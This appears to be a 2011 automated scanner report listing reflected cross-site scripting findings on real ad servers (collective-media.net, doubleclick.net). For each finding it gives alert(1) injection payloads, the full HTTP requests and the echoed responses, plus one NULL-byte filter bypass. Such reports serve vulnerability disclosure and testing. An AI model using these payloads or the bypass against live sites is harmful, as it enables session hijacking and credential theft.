Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f10a2<script>alert(1)</script>53d79e419f3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adf10a2<script>alert(1)</script>53d79e419f3/cm.merriamwebster/ron_010110 HTTP/1.1 Host: a.collective-media.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dc-dal-sea; dp2=1; apnx=1; qcms=1; rdst12=1; JY57=3dY1_FHES3TRHCZNmOsvTJNeUatqJcvX7Nq1uKJSzEoZ2NeTOgc4cAw; cli=11e4f07c0988ac7; nadp=1; mmpg=1; targ=1; rdst11=1; qcdp=1;
Response
HTTP/1.1 404 Not Found Server: nginx/0.7.65 Content-Type: text/html Content-Length: 86 Date: Tue, 08 Mar 2011 11:59:13 GMT Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6c7a'-alert(1)-'d8ef1576c28 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 454 Vary: Accept-Encoding Date: Mon, 07 Mar 2011 00:56:44 GMT Connection: close Set-Cookie: dc=dal-dc-sea; domain=collective-media.net; path=/; expires=Wed, 06-Apr-2011 00:56:44 GMT
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 243d1'-alert(1)-'a765c13a6fe was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: nginx/0.8.52 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 454 Date: Mon, 07 Mar 2011 00:56:45 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dc-dal-sea; domain=collective-media.net; path=/; expires=Wed, 06-Apr-2011 00:56:45 GMT
1.4. http://a.collective-media.net/adj/cm.merriamwebster/ron_010110 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://a.collective-media.net
Path:
/adj/cm.merriamwebster/ron_010110
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload effe1'-alert(1)-'8cb31a19829 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 458 Vary: Accept-Encoding Date: Mon, 07 Mar 2011 00:56:44 GMT Connection: close Set-Cookie: dc=dal-dc-sea; domain=collective-media.net; path=/; expires=Wed, 06-Apr-2011 00:56:44 GMT
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e194e'-alert(1)-'1da20828cff was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 455 Vary: Accept-Encoding Date: Mon, 07 Mar 2011 00:56:44 GMT Connection: close Set-Cookie: dc=dal-dc-sea; domain=collective-media.net; path=/; expires=Wed, 06-Apr-2011 00:56:44 GMT
The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e36a2"-alert(1)-"60de33534d4 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B8tg3uNl0TaPeMNf2lQeK34mNBpWpie8BhaKK8hLjqLazM8DwkwIQARgBIL7O5Q04AFDEwrTWBmDJ5vaGyKOgGaABo67u9gO6AQk3Mjh4OTBfYXPIAQnaAUBmaWxlOi8vL0M6L2Nkbi94L2IveHNzLWRvcmstY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctYmxla2tvLmNvbS5odG1suAIYwAIFyALl78UYqAMB0QNNxtOXVCOvkegD3AXoA7oC6APiBfUDAAAAxA&num=1&sig=AGiWqtyklQ5zrv2l-FIaE5i46j2_kXQNIg&client=ca-pub-4063878933780912&adurl=e36a2"-alert(1)-"60de33534d4 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1299525182&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fx%2Fb%2Fxss-dork-cross-site-scripting-blekko.com.html&dt=1299503582575&shv=r20101117&jsv=r20110208&saldr=1&correlator=1299503582597&frm=0&adk=1607234649&ga_vid=1043384173.1299503583&ga_sid=1299503583&ga_hid=1378436686&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1609&bih=1006&fu=0&ifi=1&dtd=52&xpc=VBJ7QBfkhZ&p=file%3A// Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7082 Cache-Control: no-cache Pragma: no-cache Date: Mon, 07 Mar 2011 13:16:17 GMT Expires: Mon, 07 Mar 2011 13:16:17 GMT
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... eHNzLWRvcmstY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctYmxla2tvLmNvbS5odG1suAIYwAIFyALl78UYqAMB0QNNxtOXVCOvkegD3AXoA7oC6APiBfUDAAAAxA&num=1&sig=AGiWqtyklQ5zrv2l-FIaE5i46j2_kXQNIg&client=ca-pub-4063878933780912&adurl=e36a2"-alert(1)-"60de33534d4http://ads.networksolutions.com/landing?code=P99C519S512N0B2A1D38E0000V109"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never ...[SNIP]...
The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8e24"-alert(1)-"68e3df219f9 was submitted in the ai parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B8tg3uNl0TaPeMNf2lQeK34mNBpWpie8BhaKK8hLjqLazM8DwkwIQARgBIL7O5Q04AFDEwrTWBmDJ5vaGyKOgGaABo67u9gO6AQk3Mjh4OTBfYXPIAQnaAUBmaWxlOi8vL0M6L2Nkbi94L2IveHNzLWRvcmstY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctYmxla2tvLmNvbS5odG1suAIYwAIFyALl78UYqAMB0QNNxtOXVCOvkegD3AXoA7oC6APiBfUDAAAAxAa8e24"-alert(1)-"68e3df219f9&num=1&sig=AGiWqtyklQ5zrv2l-FIaE5i46j2_kXQNIg&client=ca-pub-4063878933780912&adurl=;ord=1467384676? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1299525182&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fx%2Fb%2Fxss-dork-cross-site-scripting-blekko.com.html&dt=1299503582575&shv=r20101117&jsv=r20110208&saldr=1&correlator=1299503582597&frm=0&adk=1607234649&ga_vid=1043384173.1299503583&ga_sid=1299503583&ga_hid=1378436686&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1609&bih=1006&fu=0&ifi=1&dtd=52&xpc=VBJ7QBfkhZ&p=file%3A// Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 07 Mar 2011 13:13:27 GMT Vary: Accept-Encoding Expires: Mon, 07 Mar 2011 13:13:27 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7182
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... Q04AFDEwrTWBmDJ5vaGyKOgGaABo67u9gO6AQk3Mjh4OTBfYXPIAQnaAUBmaWxlOi8vL0M6L2Nkbi94L2IveHNzLWRvcmstY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctYmxla2tvLmNvbS5odG1suAIYwAIFyALl78UYqAMB0QNNxtOXVCOvkegD3AXoA7oC6APiBfUDAAAAxAa8e24"-alert(1)-"68e3df219f9&num=1&sig=AGiWqtyklQ5zrv2l-FIaE5i46j2_kXQNIg&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fads.networksolutions.com/landing%3Fcode%3DP61C151S512N0B2A1D687E0000V102%26promo%3DBCXXX04225"); var fsc ...[SNIP]...
The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f8a5"-alert(1)-"9a5b399f5f2 was submitted in the client parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B8tg3uNl0TaPeMNf2lQeK34mNBpWpie8BhaKK8hLjqLazM8DwkwIQARgBIL7O5Q04AFDEwrTWBmDJ5vaGyKOgGaABo67u9gO6AQk3Mjh4OTBfYXPIAQnaAUBmaWxlOi8vL0M6L2Nkbi94L2IveHNzLWRvcmstY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctYmxla2tvLmNvbS5odG1suAIYwAIFyALl78UYqAMB0QNNxtOXVCOvkegD3AXoA7oC6APiBfUDAAAAxA&num=1&sig=AGiWqtyklQ5zrv2l-FIaE5i46j2_kXQNIg&client=ca-pub-40638789337809129f8a5"-alert(1)-"9a5b399f5f2&adurl=;ord=1467384676? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1299525182&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fx%2Fb%2Fxss-dork-cross-site-scripting-blekko.com.html&dt=1299503582575&shv=r20101117&jsv=r20110208&saldr=1&correlator=1299503582597&frm=0&adk=1607234649&ga_vid=1043384173.1299503583&ga_sid=1299503583&ga_hid=1378436686&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1609&bih=1006&fu=0&ifi=1&dtd=52&xpc=VBJ7QBfkhZ&p=file%3A// Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 07 Mar 2011 13:15:40 GMT Vary: Accept-Encoding Expires: Mon, 07 Mar 2011 13:15:40 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7182
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... i94L2IveHNzLWRvcmstY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctYmxla2tvLmNvbS5odG1suAIYwAIFyALl78UYqAMB0QNNxtOXVCOvkegD3AXoA7oC6APiBfUDAAAAxA&num=1&sig=AGiWqtyklQ5zrv2l-FIaE5i46j2_kXQNIg&client=ca-pub-40638789337809129f8a5"-alert(1)-"9a5b399f5f2&adurl=http%3a%2f%2fads.networksolutions.com/landing%3Fcode%3DP61C151S512N0B2A1D687E0000V102%26promo%3DBCXXX04225"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg ...[SNIP]...
The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8293c"-alert(1)-"5a363da0fe6 was submitted in the num parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B8tg3uNl0TaPeMNf2lQeK34mNBpWpie8BhaKK8hLjqLazM8DwkwIQARgBIL7O5Q04AFDEwrTWBmDJ5vaGyKOgGaABo67u9gO6AQk3Mjh4OTBfYXPIAQnaAUBmaWxlOi8vL0M6L2Nkbi94L2IveHNzLWRvcmstY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctYmxla2tvLmNvbS5odG1suAIYwAIFyALl78UYqAMB0QNNxtOXVCOvkegD3AXoA7oC6APiBfUDAAAAxA&num=18293c"-alert(1)-"5a363da0fe6&sig=AGiWqtyklQ5zrv2l-FIaE5i46j2_kXQNIg&client=ca-pub-4063878933780912&adurl=;ord=1467384676? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1299525182&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fx%2Fb%2Fxss-dork-cross-site-scripting-blekko.com.html&dt=1299503582575&shv=r20101117&jsv=r20110208&saldr=1&correlator=1299503582597&frm=0&adk=1607234649&ga_vid=1043384173.1299503583&ga_sid=1299503583&ga_hid=1378436686&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1609&bih=1006&fu=0&ifi=1&dtd=52&xpc=VBJ7QBfkhZ&p=file%3A// Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 07 Mar 2011 13:14:10 GMT Vary: Accept-Encoding Expires: Mon, 07 Mar 2011 13:14:10 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7191
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... EwrTWBmDJ5vaGyKOgGaABo67u9gO6AQk3Mjh4OTBfYXPIAQnaAUBmaWxlOi8vL0M6L2Nkbi94L2IveHNzLWRvcmstY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctYmxla2tvLmNvbS5odG1suAIYwAIFyALl78UYqAMB0QNNxtOXVCOvkegD3AXoA7oC6APiBfUDAAAAxA&num=18293c"-alert(1)-"5a363da0fe6&sig=AGiWqtyklQ5zrv2l-FIaE5i46j2_kXQNIg&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fads.networksolutions.com/landing%3Fcode%3DP111C519S512N0B2A1D688E0000V101%26promo%3DBCXXX04226"); var fscUrl = ...[SNIP]...
The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8acd0"-alert(1)-"583d7c1bf92 was submitted in the sig parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B8tg3uNl0TaPeMNf2lQeK34mNBpWpie8BhaKK8hLjqLazM8DwkwIQARgBIL7O5Q04AFDEwrTWBmDJ5vaGyKOgGaABo67u9gO6AQk3Mjh4OTBfYXPIAQnaAUBmaWxlOi8vL0M6L2Nkbi94L2IveHNzLWRvcmstY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctYmxla2tvLmNvbS5odG1suAIYwAIFyALl78UYqAMB0QNNxtOXVCOvkegD3AXoA7oC6APiBfUDAAAAxA&num=1&sig=AGiWqtyklQ5zrv2l-FIaE5i46j2_kXQNIg8acd0"-alert(1)-"583d7c1bf92&client=ca-pub-4063878933780912&adurl=;ord=1467384676? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1299525182&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fx%2Fb%2Fxss-dork-cross-site-scripting-blekko.com.html&dt=1299503582575&shv=r20101117&jsv=r20110208&saldr=1&correlator=1299503582597&frm=0&adk=1607234649&ga_vid=1043384173.1299503583&ga_sid=1299503583&ga_hid=1378436686&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1609&bih=1006&fu=0&ifi=1&dtd=52&xpc=VBJ7QBfkhZ&p=file%3A// Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 07 Mar 2011 13:15:03 GMT Vary: Accept-Encoding Expires: Mon, 07 Mar 2011 13:15:03 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7143
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... BfYXPIAQnaAUBmaWxlOi8vL0M6L2Nkbi94L2IveHNzLWRvcmstY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctYmxla2tvLmNvbS5odG1suAIYwAIFyALl78UYqAMB0QNNxtOXVCOvkegD3AXoA7oC6APiBfUDAAAAxA&num=1&sig=AGiWqtyklQ5zrv2l-FIaE5i46j2_kXQNIg8acd0"-alert(1)-"583d7c1bf92&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fads.networksolutions.com/landing%3Fcode%3DP61C519S512N0B2A1D573E0000V102%26promo%3DHOSTING599"); var fscUrl = url; var fscUrlClickTagFound = false; ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0073ec1"-alert(1)-"252bbba8c84 was submitted in the sz parameter. This input was echoed as 73ec1"-alert(1)-"252bbba8c84 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Request
GET /adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l%0073ec1"-alert(1)-"252bbba8c84&ai=B8tg3uNl0TaPeMNf2lQeK34mNBpWpie8BhaKK8hLjqLazM8DwkwIQARgBIL7O5Q04AFDEwrTWBmDJ5vaGyKOgGaABo67u9gO6AQk3Mjh4OTBfYXPIAQnaAUBmaWxlOi8vL0M6L2Nkbi94L2IveHNzLWRvcmstY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctYmxla2tvLmNvbS5odG1suAIYwAIFyALl78UYqAMB0QNNxtOXVCOvkegD3AXoA7oC6APiBfUDAAAAxA&num=1&sig=AGiWqtyklQ5zrv2l-FIaE5i46j2_kXQNIg&client=ca-pub-4063878933780912&adurl=;ord=1467384676? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1299525182&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fx%2Fb%2Fxss-dork-cross-site-scripting-blekko.com.html&dt=1299503582575&shv=r20101117&jsv=r20110208&saldr=1&correlator=1299503582597&frm=0&adk=1607234649&ga_vid=1043384173.1299503583&ga_sid=1299503583&ga_hid=1378436686&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1609&bih=1006&fu=0&ifi=1&dtd=52&xpc=VBJ7QBfkhZ&p=file%3A// Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7060 Cache-Control: no-cache Pragma: no-cache Date: Mon, 07 Mar 2011 13:12:56 GMT Expires: Mon, 07 Mar 2011 13:12:56 GMT
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3ac3/7/1a9/%2a/m%3B234427573%3B0-0%3B0%3B50265527%3B3454-728/90%3B38432219/38449976/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l%0073ec1"-alert(1)-"252bbba8c84&ai=B8tg3uNl0TaPeMNf2lQeK34mNBpWpie8BhaKK8hLjqLazM8DwkwIQARgBIL7O5Q04AFDEwrTWBmDJ5vaGyKOgGaABo67u9gO6AQk3Mjh4OTBfYXPIAQnaAUBmaWxlOi8vL0M6L2Nkbi94L2IveHNzLWRvcmstY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctYmxla2tvLmNv ...[SNIP]...
The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload afbfa'-alert(1)-'59510ce7fea was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N553.mediamath/B5123370.14;sz=300x250;pc=;click1=http://pixel.mathtag.com/click/img?mt_aid=59956497948800832&mt_id=111028&mt_adid=70afbfa'-alert(1)-'59510ce7fea&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=59956497948800832? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.merriam-webster.com/creative.php?pageid=Dictionary&placement=MW_DICT_300_TOP&groupid=8308787085&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 07 Mar 2011 01:40:15 GMT Vary: Accept-Encoding Expires: Mon, 07 Mar 2011 01:40:15 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 520
The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6fcd'-alert(1)-'419279fa279 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N553.mediamath/B5123370.14;sz=300x250;pc=;click1=http://pixel.mathtag.com/click/img?mt_aid=59956497948800832&mt_id=111028a6fcd'-alert(1)-'419279fa279&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=59956497948800832? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.merriam-webster.com/creative.php?pageid=Dictionary&placement=MW_DICT_300_TOP&groupid=8308787085&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response
